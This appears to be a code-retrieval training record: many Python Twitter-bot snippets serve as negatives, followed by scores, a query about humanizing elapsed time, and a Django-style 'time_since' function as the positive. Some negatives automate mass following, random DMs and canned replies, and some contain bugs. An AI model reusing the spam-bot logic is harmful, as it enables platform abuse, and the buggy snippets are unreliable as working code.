tweet_mode='extended')\n\n for mention in reversed(mentions):\n print(str(mention.id) + ' - ' + mention.full_text, flush=True)\n last_seen_id = mention.id\n store_last_seen_id(last_seen_id, FILE_NAME)\n for i in range(len(keywords)):\n if keywords[i] in mention.full_text.lower():\n print(\"responding back to: \" + '@' +\n mention.user.screen_name, flush=True)\n api.update_status('@' + mention.user.screen_name + ' ' +\n salts[i], mention.id)", "def follow_reciprocated(self, target):\n if random.randint(1, 1000) == 1: # 1 in 20 are public @replies\n self.tweet_user(target)\n else:\n try:\n self.dm_user(target)\n except:\n pass", "def check(self):\n self.__check_request_limit()", "def get_tweets_by_user_route(username):\n response, code = get_tweets_by_user(\n username, request.args.get('limit', 30))\n return jsonify(response), code", "def __init__(self):\n super().__init__()\n\n # Will only reply to every 3rd or so tweet, defined in settings\n self.received_tweet_count = 0\n\n # Twitter api init\n self.auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n self.auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\n self.twitter_api = tweepy.API(self.auth)\n\n print('Authenticated, creating stream...')\n\n self._init_stream()", "def tweet_btn_clicked(self,widget, data=None):\n tweet_text = self.get_text(\"txt_tweet\") \n \n #double check the length and go.\n if (len(tweet_text) <= 140): \n self.twitter.UpdateStatus(tweet_text) \n status_label = self.builder.get_object(\"status_lbl\")\n #clear the text box and update the status\n self.builder.get_object(\"txt_tweet\").set_text(\"\")\n my_tweet_bufffer = self.builder.get_object(\"personal_tweet_buffer\")\n iters = my_tweet_bufffer.get_end_iter()\n my_tweet_bufffer.insert(iters, \"%s\\n\\n\" % tweet_text)\n else:\n status_label = self.builder.get_object(\"status_lbl\")\n status_label.set_text(\"Too long: Tweet != Blog -__-\")\n print tweet_text", "def skip_tweet(self, status, from_stream=True):\n log_status = 'author: {}, reply_to_status: {}, reply_to_user: {}, quoting: {}, retweet: {}, text: {}'\n log_status = log_status.format(status.author.screen_name,\n status.in_reply_to_status_id,\n status.in_reply_to_user_id,\n status.is_quote_status,\n hasattr(status, 'retweeted_status'),\n status.text)\n\n # Ignore replies\n if status.in_reply_to_status_id or status.in_reply_to_user_id:\n log.debug('Ignoring tweet (reply): ' + 
log_status)\n return True\n elif from_stream and status.author.id_str not in self.stream.get_follows():\n log.debug('Ignoring tweet (bad author): ' + log_status)\n return True\n else:\n log.debug('Dispatching tweet to handler: ' + log_status)\n return False", "async def tweet():\n with logger.contextualize(request_id=str(uuid.uuid4())):\n tweets = generate()\n upload(tweets)", "def TwitterListener():\n l = StdOutListener()\n auth = OAuthHandler(config.CONSUMER_KEY, config.CONSUMER_SECRET)\n auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n stream = Stream(auth, l)\n api = API(auth_handler=auth)\n config.HASHTAGS = [x['name'] for x in api.trends_place(id=44418)[0]['trends']]\n\n print(\"Stream listener is up and running\")\n stream.filter(track=config.HASHTAGS)", "def _apply_rate_limit(self):\n update_time = time()\n user_name = self.bot.user.full_name\n if user_name in self.tokens.keys():\n last_change = self.tokens[user_name][0]\n # Add 1 token for every 30 seconds from the last change\n added_tokens = int((update_time - last_change) / 30)\n self.tokens[user_name][1] += added_tokens\n # Max at 5 self.tokens\n if self.tokens[user_name][1] > 5:\n self.tokens[user_name][1] = 5\n else:\n # Initialize the users token pair (last change, # of self.tokens)\n self.tokens[user_name] = [update_time, 5] # Start with 5 self.tokens\n if self.tokens[user_name][1] <= 0:\n return False\n self.tokens[user_name][1] -= 1\n return True", "def get_tweets(username, amount):\n tweets = []\n twitter = Twython()\n\n finished = False\n page = 1\n while not finished:\n\n if amount <= 200:\n # Make the API call.\n search_results = twitter.getUserTimeline(screen_name=username,\n page=str(page), count=str(amount))\n finished = True\n\n else:\n # Make the API call.\n search_results = twitter.getUserTimeline(screen_name=username,\n page=str(page), count='200')\n amount -= 200\n page += 1\n\n if isinstance(search_results, dict) and search_results['error']:\n raise TwitterAPIException(str(search_results['error']))\n elif not search_results:\n raise TwitterAPIException('User has no tweets.')\n\n for result in search_results:\n tweets.append(result['text']) \n\n return tweets", "def send_tweet(tweet_text):\n twitter.update_status(status=tweet_text)", "def send_tweet(tweet_text):\n twitter.update_status(status=tweet_text)", "def send_tweet(tweet_text):\n twitter.update_status(status=tweet_text)", "def _throttle_check(self, request):\n identifier = self._meta.authentication.get_identifier(request)\n\n # Check to see if they should be throttled.\n if self._meta.throttle.should_be_throttled(identifier):\n # Throttle limit exceeded.\n raise ImmediateHttpResponse(response=http.HttpTooManyRequests())", "def follow_user(self, target):\n try:\n if self.api.me().friends_count > 1990:\n return\n except Exception, e:\n print e\n\n \"Rate limit exceeded. 
Clients may not make more than 350 requests per hour.\"\n if \"Clients\" in str(e):\n continue\n # import pdb; pdb.set_trace()\n return\n\n try:\n self.api.create_friendship(target.hunted.screen_name)\n self.log.debug(\"Followed: %s\" % target.hunted.screen_name)\n except Exception, e:\n self.log.exception(\"Could not follow %s\" %\n target.hunted.screen_name)\n else:\n # Write record of new follow to db\n target.status = Target.PURGATORY\n target.save()", "def sendTweets(self):\n\n if self.__status_type == 'link':\n\n for index, item in self.list.iterrows():\n\n title = item['title']\n url = item['url']\n message = (url + \" \" + title)[0:140]\n\n if self.__image == None:\n self.__api.update_status(status=message)\n else:\n self.__api.update_with_media(filename=self.__image, status=message)\n\n elif self.__status_type == 'single_msg':\n\n message = (self.__status)[0:140]\n\n if self.__image == None:\n self.__api.update_status(status=message)\n else:\n self.__api.update_with_media(filename=self.__image, status=message)\n\n elif self.__status_type == 'reply':\n\n for index, item in self.list.iterrows():\n\n message = (\".@\" + item['user'] + \" \" + self.__status)[0:140]\n\n try:\n if self.__image == None:\n self.__api.update_status(status=message, in_reply_to_status_id=item['id'])\n else:\n self.__api.update_with_media(filename=self.__image, status=message,\n in_reply_to_status_id=item['id'])\n except KeyError:\n print(\"List does not include necessary column(s).\")\n print(\"reply status type used when generating list based on Twitter search.\")\n print(\"Change search_on to twitter and create list.\")\n return\n\n elif self.__status_type == 'at':\n\n for index, item in self.list.iterrows():\n\n try:\n\n message = (\".@\" + item['user'] + \" \" + self.__status)[0:140]\n\n if self.__image == None:\n self.__api.update_status(status=message)\n else:\n self.__api.update_with_media(filename=self.__image, status=message)\n\n except KeyError:\n print(\"List does not include necessary column(s).\")\n print(\"at status type used when generating list based on Twitter search.\")\n print(\"Change search_on to twitter and create list.\")\n return\n\n elif self.__status_type == 'rt':\n\n for index, item in self.list.iterrows():\n try:\n self.__api.retweet(item['id'])\n except KeyError:\n print(\"List does not include necessary column(s).\")\n print(\"at status type used when generating list based on Twitter search.\")\n print(\"Change search_on to twitter and create list.\")\n return\n\n else:\n print(\"Invalid status type. Change status type through configure_tweet method.\")\n\n return", "def tweet_call(self):\n check = True\n # if a since_id and a max_id is given, the new since_id shouldn't be taken\n # into account because it will be lower than a previous record\n # the mnax_id is used when several call are needed\n if self.last_max_id is None and self.since_id is not None:\n self.since_id = None\n while check is True:\n result = self.create_URL()\n # Return a list of tweet, need to get the last tweet\n # To have the latest tweet. 
The -1 to avoid redundancies\n try:\n result.max_id = int(result.response[-1]['id']) - 1\n self.last_max_id = result.max_id\n self.parameters['max_id'] = result.max_id\n # self.parameters['since_id'] = result.since_id\n if self.since_id is not None:\n result.since_id = self.since_id\n else:\n self.since_id = int(result.response[0]['id'])\n result.since_id = self.since_id\n # Last return is an empty list because the last max_id match the last tweet\n # When try to collect response from a protected account\n # return the str() \"protected\" and break here\n # so just pass an go straight to the yield result\n except (IndexError, TypeError):\n try:\n result.max_id = self.last_max_id\n except AttributeError:\n result.max_id = None\n try:\n result.since_id = self.since_id\n except AttributeError:\n result.since_id = None\n check = False\n yield result", "def filter_yt(info: interceptor.Request):\n\turl = info.request_url\n\tif (url.host() == 'www.youtube.com' and\n\t\t\turl.path() == '/get_video_info' and\n\t\t\t'&adformat=' in url.query()):\n\t\tinfo.block()", "def reply_to_tweet():\n\n print('retrieving and replying to tweets...')\n all_mentions = api.mentions_timeline()\n\n # The content of the reply that the bot will send.\n rap_message = ' yo yo yo yo'\n\n for mention in reversed(all_mentions):\n\n # print(str(mention.id) + '-' + mention.text)\n\n if 'rap for me' in mention.text.lower():\n # checks if the bot received a request to deliver a rap\n print('received a request')\n print('dropping a new single...')\n # Checks if the latest mention came from the same person.\n if mention.id == mention.id[0]:\n # Posts a tweet saying the bot is 'too tired' and won't generate a new rap.\n api.update_status('@' + mention.user.screen_name + ' yo sorry I am too tired right now')\n else:\n # Posts a tweet with the rap to the user.\n api.update_status('@' + mention.user.screen_name + rap_message, mention.id)\n print('single dropped.')", "def set_throttle(self, limit=None, units=None):\n self.delay = 0\n self.max_requests = 1e16\n self.made_requests = 0", "def twitter_auth(k, s):\n\n auth = tweepy.AppAuthHandler(k, s)\n api = tweepy.API(\n auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True\n )\n\n if (not api):\n return None\n else:\n return api", "def disable_rate_limit_forward(self):\n self.headers = {\n 'Content-Type': 'application/json; charset=utf-8',\n 'X-Algolia-API-Key': self.api_key,\n 'X-Algolia-Application-Id': self.application_id,\n 'User-Agent': ('Algolia Search for python %s' % VERSION)\n }", "def tweet(chains):\n\n # Use Python os.environ to get at environmental variables\n # Note: you must run `source secrets.sh` before running this file\n # to make sure these environmental variables are set.\n\n api = twitter.Api(\n consumer_key=os.environ['TWITTER_CONSUMER_KEY'],\n consumer_secret=os.environ['TWITTER_CONSUMER_SECRET'],\n access_token_key=os.environ['TWITTER_ACCESS_TOKEN_KEY'],\n access_token_secret=os.environ['TWITTER_ACCESS_TOKEN_SECRET'])\n\n # print api.VerifyCredentials()\n\n user_choice = None\n while not (user_choice == 'q' or user_choice == 'Q'):\n status = api.PostUpdate(make_text(chains))\n #status = api.PostUpdate(\"Something random\")\n\n print status.text\n user_choice = raw_input(\"Enter to tweet again [q to quit] > \")", "def filter_tweet_core(tweet):\n if not ('user' in tweet and 'screen_name' in tweet['user'] \\\n and 'text' in tweet):\n return False\n if not filter_tweet_text(tweet['text']):\n return False\n if bannedclients.search(tweet['source']):\n return 
False\n if bannedterms.search(tweet['text']):\n return False\n if bannedterms.search(tweet['user']['screen_name']):\n return False\n if 'entities' in tweet and bannedterms.search(json.dumps(tweet['entities'])):\n return False\n if not filter_tweet_entropy(tweet['text']):\n return False\n if not filter_tweet_cardspam(tweet):\n return False\n return True", "def check_rate_limit(session, provided_iocs):\n rate_limit = session.rate_limit_status()[\"resources\"][\"search\"][\"/search/tweets\"]\n\n if rate_limit[\"remaining\"] == 0:\n reset_time = rate_limit[\"reset\"]\n rate_limit[\"reset\"] = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(reset_time))\n return rate_limit\n\n if len(provided_iocs) > rate_limit[\"remaining\"]:\n rate_limit = {\"Search term limit\": rate_limit[\"remaining\"],\n \"Total Search Terms Provided\": len(provided_iocs)}\n return rate_limit\n return", "def _filter_in_request(self):\n pass", "def twitterCall(methodName,args,credentials=False):\n api = ratedTwitter(credentials=credentials)\n limit = api.__can_we_do_that__(methodName)\n if limit:\n print '*** TWITTER RATE-LIMITED: '+methodName+' ***'\n raise twitterCall.retry(exc=Exception('Twitter rate-limited',methodName), countdown = limit)\n else:\n okay, result = api.__method_call__(methodName,args)\n if okay:\n print '*** TWITTER CALL: '+methodName+' ***' \n return result\n else:\n assert False", "def tweet_user(self, target, msg=None):\n self.log.debug(\"Tweeting %s\" % target.hunted.screen_name)\n tweet = \"@%s: %s\" % (target.hunted.screen_name,\n random.sample(self.tweets, 1)[0])\n tweet = tweet [:140]\n self.api.update_status(tweet)\n target.status = Target.FOLLOWER\n target.save()", "def check_rate_limit(api, url, zzz=180.0):\n pattern = 'https:\\/\\/api.twitter.com\\/.*(\\/([a-z_]*)\\/.*)\\.json'\n endpoint, family = re.match(pattern, url).groups()\n url = \"https://api.twitter.com/1.1/application/rate_limit_status.json\"\n params = {\"resources\": [family]}\n response = api.get(url, params=params)\n response.close()\n try:\n return response.json()[\"resources\"][family][endpoint]\n except KeyError:\n try:\n return response.json()[\"resources\"][family][endpoint + '/:id']\n except KeyError:\n print \"Error checking rate limit status:\"\n print response.json()\n print \"Sleeping {:,}s and trying again...\".format(zzz)\n # DEBUG\n # Weirdly we get an OpenSSL error everytime\n # we go to sleep\n time.sleep(zzz)\n return check_rate_limit(api, url, zzz=zzz*2)", "def send(self, *args, **kwargs):\n thread_id = id(current_thread())\n denyaccess = thread_id in self.blacklist\n if not thread_id in self.whitelist:\n if self.timelimit is not None:\n denyaccess |= (self.get_elapsed_time() > self.timelimit)\n denyaccess |= self.stop_event.is_set()\n if denyaccess:\n raise AccessDenied(thread_id)\n else:\n return self.manager(self, *args, **kwargs)", "async def fortune(self, ctx: Message):\n\t\treq = requests.get(\"http://yerkee.com/api/fortune\").json()[\"fortune\"]\n\t\tline = req.replace('\\n', '').replace('\\t', '')\n\t\tawait self.send(line, whisper=[ctx.author.id])", "def throttle(self):\n\n # Check how long it has been since last request was sent\n time_since_req = time.time() - self.time_last_req\n\n # If last request was too recent, pause\n if time_since_req < self.wait_time:\n self.wait(self.wait_time - time_since_req)", "def Tweet_stream():\r\n \r\n while True:\r\n name = multiprocessing.current_process().name\r\n \r\n \r\n #try:\r\n \r\n print('Begin Tweet Attempt')\r\n \r\n Do_RT()\r\n time.sleep(1)\r\n \r\n 
\r\n #except:\r\n #add rate limit\r\n #print('Tweet Stream Error')\r\n #continue\r\n #Tweet_stream()\r", "def get_tweets(self, output_path, tweets_ids):\n\n\t\tloading = 0\n\n\t\tapp = TwitterApp.get_twitter_app_instance(self)\n\n\t\ttweets_content = []\n\n\t\tnew_tweets_ids = []\n\n\t\tqty_tweets = len(tweets_ids)\n\n\t\tlast_index = 0\n\n\t\twhile True:\n\t\t\t\n\t\t\ttry:\n\n\t\t\t\tresponse = app.GetStatuses(tweets_ids[last_index:last_index+100], map=True)\n\t\t\t\t\n\t\t\texcept Exception as e:\n\n\t\t\t\t# save the available posts to this time\n\t\t\t\tdataset = pd.DataFrame({'tweet_id':new_tweets_ids, 'post_content':tweets_content})\n\t\t\t\twrite_tweets(output_path, dataset)\n\n\t\t\t\tlogging.info(''.join(['Error on request ', str(loading)]))\n\n\t\t\t\tprint(\"ERROR:\", e)\n\n\t\t\t\t'''\n\t\t\t\tUsually, the rate limit allowed by Twitter API is exceeded (in this case GET statuses/lookup is 900 for user auth and 300 for the app auth for every 15 minutes), one way to deal with it is sleeping the code for approximately 15 minutes to continue after.\n\t\t\t\t'''\n\t\t\t\ttime.sleep(950)\n\n\t\t\t\ttry:\n\n\t\t\t\t\tresponse = app.GetStatuses(tweets_ids[last_index:last_index+100], map=True)\n\t\t\t\t\n\t\t\t\texcept Exception as e:\n\n\t\t\t\t\tprint(e)\n\t\t\t\t\texit(1)\n\n\n\t\t\tfor id_value, text in response.items():\t\t\t\n\n\t\t\t\t# This means that the post is not available now.\n\t\t\t\tif (text == None):\n\t\t\t\t\tcontinue\n\n\t\t\t\telse:\n\n\t\t\t\t\tnew_tweets_ids.append(id_value)\n\t\t\t\t\ttweets_content.append(text.text)\n\n\t\t\t# Each request gets 100 posts\n\t\t\tlast_index = last_index + 100\n\n\t\t\t# There is no more IDs\n\t\t\tif (last_index > qty_tweets):\n\t\t\t\tbreak\t\n\t\t\n\t\t# save all tweets\n\t\tdataset = pd.DataFrame({'tweet_id':new_tweets_ids, 'post_content':tweets_content})\n\t\twrite_tweets(output_path, dataset)", "def users_being_followed_tweets():\n username = request.authorization.username\n tweets = []\n\n user_id = get_user_id(username);\n tuples = query_db('''\n select message.*, user.* from message, user\n where message.author_id = user.user_id and (\n user.user_id = ? or\n user.user_id in (select whom_id from follower\n where who_id = ?))\n order by message.pub_date desc limit ?''',\n [user_id, user_id, PER_PAGE])\n\n for tuple in tuples:\n tweet = {}\n tweet[\"message_id\"] = tuple['message_id']\n tweet[\"author_id\"] = tuple['author_id']\n tweet[\"text\"] = tuple['text']\n tweet[\"pub_date\"] = tuple['pub_date']\n tweet[\"username\"] = tuple['username']\n tweet[\"email\"] = tuple['email']\n tweets.append(tweet)\n\n return jsonify({'tweets': tweets}), 200", "def post_to_twitter(sender, instance, **kwargs):\n\n if instance.pk: #only post the tweet if it's a new record. 
\n return False \n \n accounts = TwitterAccount.objects.all()\n \n for account in accounts:\n bittle = Bittle.objects.bitlify(instance.get_absolute_url())\n mesg = \"%s: %s\" % (\"New Blog Post\", bittle.shortUrl)\n username = account.username\n password = account.get_password()\n try:\n twitter_api = twitter.Api(username, password)\n twitter_api.PostUpdate(mesg)\n except urllib2.HttpError, ex:\n print str(ex)\n return False", "def on_success(self, data):\n\n # only want to collect English-language tweets\n if data['lang'] == 'en':\n tweet = data['text']\n processed_tweets.append(preprocess_tweet(tweet))\n\n # stop when we've collected enough\n if len(processed_tweets) >= 5:\n self.disconnect()", "def on_data(self, data):\n # Try-Except used by tweepy\n try:\n # If the limit type is time, and the time passed is less than the limit, continue\n if self.limit_type == \"TIME\" and (time.time() - self.start_time < self.limit):\n item = json.loads(data)\n print(item)\n if 'created_at' in item.keys():\n self.temp |= set(item.keys())\n self.database.store_data(item)\n else:\n pass\n # The below is a check to prevent entering another loop by forcing the stream to be cutoff\n if (time.time() - self.start_time) < self.limit:\n return True\n else:\n self.database.finish()\n return False\n # If the limit type is count, and the number of tweets streamed in hasn't reached the limit, continue\n elif self.limit_type == \"COUNT\" and self.limit != 0:\n # See limit type = 'TIME' for confusion about below\n item = json.loads(data)\n if 'created_at' in item.keys():\n good = self.database.store_data(item)\n self.limit += good\n self.limit -= 1\n else:\n pass\n if self.limit > 0:\n return True\n else:\n self.database.finish()\n # Call counter\n return False\n else:\n return False\n except BaseException as e:\n print(e)\n return True", "def get_tweets(twitter, screen_name, num_tweets):\n\n request = robust_request(twitter, 'search/tweets', {'q': screen_name, 'count': num_tweets})\n tweets = [a['text'] for a in request]\n\n return tweets", "def search_machine(ID,machine):\n\tconsumer_key = machine['consumer_key']\n\tconsumer_secret = machine['consumer_secret']\n\taccess_token = machine['access_token']\n\taccess_secret = machine['access_secret']\n\tauth = OAuthHandler(consumer_key, consumer_secret)\n\tauth.set_access_token(access_token, access_secret)\n\tapi = tweepy.API(auth, wait_on_rate_limit_notify=True)\n\n\t\"\"\"Search for tweets via Twitter Search API.\"\"\"\n\tsinceId = None\n\tmax_id = ID\n\ttweetsCounts = 0\n\tfinshed_job = False\n\twith open (outfile,'w+') as f:\n\t\twhile tweetsCounts < maxTweets:\n\t\t\ttry:\n\t\t\t\tif (max_id <= 0):\n\t\t\t\t\tif (not sinceId):\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq = query,\n\t\t\t\t\t\t\tgeocode = geo,\n\t\t\t\t\t\t\tcount = searchLimits)\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq=query,\n\t\t\t\t\t\t\tcount = searchLimits,\n\t\t\t\t\t\t\tgeocode=geo,\n\t\t\t\t\t\t\tsinceId = sinceId)\n\t\t\t\telse:\n\t\t\t\t\tif (not sinceId):\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq=query, \n\t\t\t\t\t\t\tcount=searchLimits,\n\t\t\t\t\t\t\tgeocode = geo,\n\t\t\t\t\t\t\tmax_id=str(max_id - 1))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq=query, \n\t\t\t\t\t\t\tcount=searchLimits,\n\t\t\t\t\t\t\tgeocode = geo,\n\t\t\t\t\t\t\tmax_id=str(max_id - 1),\n\t\t\t\t\t\t\tsince_id=sinceId)\n\t\t\t\tif not new_tweets:\n\t\t\t\t\tprint(\"NO MORE TWEETS\")\n\t\t\t\t\tfinshed_job = 
True\n\t\t\t\t\tbreak\n\t\t\t\tfor tweet in new_tweets:\n\t\t\t\t\tif tweet.coordinates or tweet.place:\n\t\t\t\t\t\tjson.dump(tweet._json,f,ensure_ascii=False)\n\t\t\t\t\t\tf.write('\\n')\n\t\t\t\t\n\t\t\t\ttweetsCounts += len(new_tweets)\n\t\t\t\t#print(\"Downloaded {0} tweets\".format(tweetsCounts))\n\t\t\t\tmax_id = new_tweets[-1].id\n\t\t\texcept tweepy.RateLimitError as e:\n\t\t\t\tprint(machine['index'],'Time to sleep 15 mins') \n\t\t\t\tAPI_status[machine['index']] = False\n\t\t\t\tif machine['index'] == 0:\n\t\t\t\t\tAPI_status['time'] = time.time() + 901.00\n\t\t\t\treturn finshed_job,max_id\n\t\t\texcept tweepy.TweepError as e:\n\t\t\t\tlogging.error(str(e))\n\t\t\t\tbreak\n\tf.close()\n\treturn finshed_job,max_id", "def answer_to_tweets(api, tweets):\n\n try:\n last_tweet_id = 0\n for tweet in tweets:\n print(\"Sending an answer to tweet {}: '{}'\".format(tweet[\"id\"],\n tweet[\"text\"]))\n api.statuses.update(status=TARGET_TWEET_ANSWER,\n in_reply_to_status_id=tweet[\"id\"])\n last_tweet_id = tweet[\"id\"]\n time.sleep(1) # do not exceed Twitter limits\n finally:\n update_last_tweet_id(last_tweet_id)", "async def add_tweet(self, tid=None): \n try:\n data=json.loads(self.request.body.decode('utf-8'))\n except: \n print(\"No data body!\")\n\n #print(\"Coordinates: {}\".format(data[\"coordinates\"]))\n if \"place\" in data:\n print(\"Place: {}\".format(data[\"place\"]))\n\n #print(\"User location: {}\".format(data[\"user\"][\"location\"]))\n #print(\"User lang: {}\".format(data[\"user\"][\"lang\"]))\n t=Tweet()\n t.tweet_id = tid\n t = self.fill_tweet(t, data)\n tweet_cache.append(t.to_dict())\n if \"retweeted_status\" in data:\n t.retweeted_status=data[\"retweeted_status\"]\n # \n # save the tweet\n #\n t.upsert()\n #\n # now handle the retweet\n #\n if \"retweeted_status\" in data:\n # this is a retweet so\n # do it once more for the original tweet\n tr=Tweet()\n tr.tweet_id = data[\"retweeted_status\"][\"id_str\"]\n tr = self.fill_tweet(tr, data[\"retweeted_status\"])\n tweet_cache.append(tr.to_dict())\n #tr.upsert()\n #r=requests.get(\"https://publish.twitter.com/oembed?url=https://twitter.com/Interior/status/\"+ t.tweet_id )\n #await self.fire_callbacks(r.json())\n #print(t.to_json(),file=ofile)\n #\n # get the embed html from twitter oembed API\n #\n r=requests.get(\"https://publish.twitter.com/oembed?url=https://twitter.com/Interior/status/\"+ t.tweet_id )\n #print(r.json())\n \n #print(self.__class__.callbacks)\n await self.fire_callbacks(r.json())\n #self.success(message=\"Added tweet id: {} \".format(str(id)), data=t.to_json(), format=\"json\", pure=True)", "def filter(self):\n\t\tparameters = {}\n\n\t\tif self.keywords:\n\t\t\tparameters['track'] = ','.join(self.keywords)\n\n\t\tif self.locations:\n\t\t\tparameters['locations'] = ','.join([','.join([str(latlong) for latlong in loc]) for loc in self.locations])\n\n\t\tif self.usernames:\n\t\t\tparameters['follow'] = ','.join([str(u) for u in self.usernames])\n\n\t\tself.launch('statuses/filter.json', parameters)", "async def _tweets(self, ctx):\n if ctx.invoked_subcommand is None:\n await self.bot.send_cmd_help(ctx)", "def command_tweet(self, bot, update):\n\n bot.sendChatAction(update.message.chat_id, action='typing')\n\n tweet = ext.get_last_tweet(self.config['twitter'])\n\n for url in tweet.get('images', []):\n self.send_photo_url(bot, update, url)\n\n messages = [\n u'{text}',\n '[@{user[screen_name]}](https://twitter.com/{user[screen_name]}) '\n '- {ago}'\n ]\n\n for msg in messages:\n self.send_message(bot, 
update, msg.format(**tweet))", "def twitter(self):\n message = \"\"\n count = self.collection.count()\n\n twitter = Twitter(auth = OAuth(self.access_key, self.access_secret, self.consumer_key, self.consumer_secret))\n for keyword in self.twitter_keywords:\n query = twitter.search.tweets(q = keyword)\n for result in query['statuses']:\n try:\n data = {\"id\": count+1, \"source\": \"twitter\", \"timestamp\": datetime.now()}\n data['tweet'] = result['text']\n data['name'] = result[\"user\"][\"screen_name\"]\n data['url'] = \"https://twitter.com/\" + data[\"name\"] + \"/status/\" + str(result['id'])\n data['search_string'] = keyword\n try:\n dataid = self.collection.insert(data)\n except DuplicateKeyError as e:\n continue\n count += 1\n\n # Slack push notification\n length = 82 - len(data['url'])\n message += \"\\nURL: \" + data['url'] + \" search string: \".rjust(length) + keyword\n\n except Exception as e:\n print(e)\n pass\n \n if message:\n print(self.G + \"[+] Twitter\" + self.B + message)\n self.message += \"\\n*Twitter*:\\n```\"\n self.message += message\n self.message += \"\\n```\"\n\n return", "def on_error(self, status_code, data):\n logging.warning(\"Error recieving tweet: {0}\".format(status_code))", "def request(self, method, url):\n\t\ttr = TwitterRequest( method.upper(), url )\n\t\treturn self.get_response( tr )", "def __init__(self):\n ### load the json to get twitter config\n # check if the file exists\n if os.path.isfile(CONFIG_FILE):\n tmp_json = json.load(open(CONFIG_FILE))\n # test if tweeting is enabled or not....\n if not tmp_json['twitter']['enable']:\n print(\"We don't want to tweet!\")\n return\n consumer_key = tmp_json['twitter']['consumer_key']\n consumer_secret = tmp_json['twitter']['consumer_secret']\n access_token_key = tmp_json['twitter']['access_token']\n access_token_secret = tmp_json['twitter']['access_token_secret']\n else:\n raise Exception(\"Twitter oauth configuration : unable to open or read file '{0}')\".format(CONFIG_FILE))\n return\n\n ### Connect to twitter\n try:\n self.api = Api(consumer_key = consumer_key,\n consumer_secret = consumer_secret,\n access_token_key = access_token,\n access_token_secret = access_token_secret)\n self.api.VerifyCredentials()\n except TwitterError:\n raise Exception(\"Unable to log in the twitter account : {0}\".format(traceback.format_exc()))" ]
[ "0.6198629", "0.6029169", "0.58477575", "0.5808274", "0.57665455", "0.57665455", "0.5764181", "0.56391084", "0.56317997", "0.5610845", "0.56010497", "0.5593688", "0.559113", "0.5582899", "0.5582899", "0.5582899", "0.5582899", "0.5582672", "0.5578223", "0.55680096", "0.55663747", "0.55476135", "0.5547392", "0.55414146", "0.55348134", "0.55220455", "0.5521493", "0.5501174", "0.54836106", "0.5475972", "0.5474732", "0.54683906", "0.54635406", "0.5460081", "0.54293174", "0.5415793", "0.53823555", "0.5372992", "0.536955", "0.53649145", "0.5360286", "0.5356299", "0.53550434", "0.5338795", "0.53348607", "0.53290105", "0.53199285", "0.53031653", "0.5292702", "0.52920103", "0.5289815", "0.5286423", "0.52830476", "0.5282232", "0.5277615", "0.5267733", "0.5265511", "0.5263746", "0.5256954", "0.52532727", "0.5246086", "0.5243697", "0.5243697", "0.5243697", "0.5237156", "0.52343374", "0.52102304", "0.5208743", "0.5195488", "0.5195032", "0.51932967", "0.5186125", "0.5178335", "0.5168903", "0.5162011", "0.51602584", "0.5160175", "0.5159212", "0.51425445", "0.5141829", "0.5138049", "0.5135707", "0.5123578", "0.5120857", "0.5117346", "0.51158875", "0.5102574", "0.50951135", "0.50897783", "0.5088836", "0.50829667", "0.50808907", "0.50661093", "0.5065631", "0.50600064", "0.5059281", "0.50577325", "0.50560504", "0.50527984", "0.5046081" ]
0.558243
18
Returns a humanized string representing the time difference between now() and the input timestamp. The output rounds up to days, hours, minutes, or seconds: 4 days 5 hours returns '4 days'; 0 days 4 hours 3 minutes returns '4 hours', etc.
def time_since(timestamp=None):
    rstr = ""
    if not timestamp or not isinstance(timestamp, datetime.datetime):
        return rstr
    now = timezone.now()
    timediff = now - timestamp
    days = timediff.days
    weeks = days//7
    months = days//30
    minutes = timediff.seconds % 3600 // 60
    seconds = timediff.seconds % 3600 % 60
    hours = timediff.seconds // 3600
    if days > 365:
        return "> a year"
    if months > 0:
        if months == 1:
            tstr = "month"
        else:
            tstr = "months"
        rstr = rstr + "%s %s" % (months, tstr)
        return rstr
    if weeks > 0:
        if weeks == 1:
            tstr = "week"
        else:
            tstr = "weeks"
        rstr = rstr + "%s %s" % (weeks, tstr)
        return rstr
    if days > 0:
        if days == 1:
            tstr = "day"
        else:
            tstr = "days"
        rstr = rstr + "%s %s" % (days, tstr)
        return rstr
    elif hours > 0:
        if hours == 1:
            tstr = "hour"
        else:
            tstr = "hours"
        rstr = rstr + "%s %s" % (hours, tstr)
        return rstr
    elif minutes > 0:
        if minutes == 1:
            tstr = "min"
        else:
            tstr = "mins"
        rstr = rstr + "%s %s" % (minutes, tstr)
        return rstr
    elif seconds > 0:
        if seconds == 1:
            tstr = "sec"
        else:
            tstr = "secs"
        rstr = rstr + "%s %s" % (seconds, tstr)
        return rstr
    else:
        return "Now"
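A minimal usage sketch of the time_since() helper above, added only for illustration and not part of the source record. It assumes the helper is in scope and that timezone refers to Django's django.utils.timezone, since the helper calls timezone.now(); the expected outputs in the comments follow the behavior described above.

import datetime
from django.utils import timezone  # assumption: timezone.now() in the helper comes from Django

now = timezone.now()
print(time_since(now - datetime.timedelta(days=4, hours=5)))     # '4 days'  -- largest unit wins
print(time_since(now - datetime.timedelta(hours=4, minutes=3)))  # '4 hours'
print(time_since(now - datetime.timedelta(seconds=42)))          # '42 secs'
print(time_since("not a datetime"))                              # ''  -- non-datetime input yields an empty string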
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
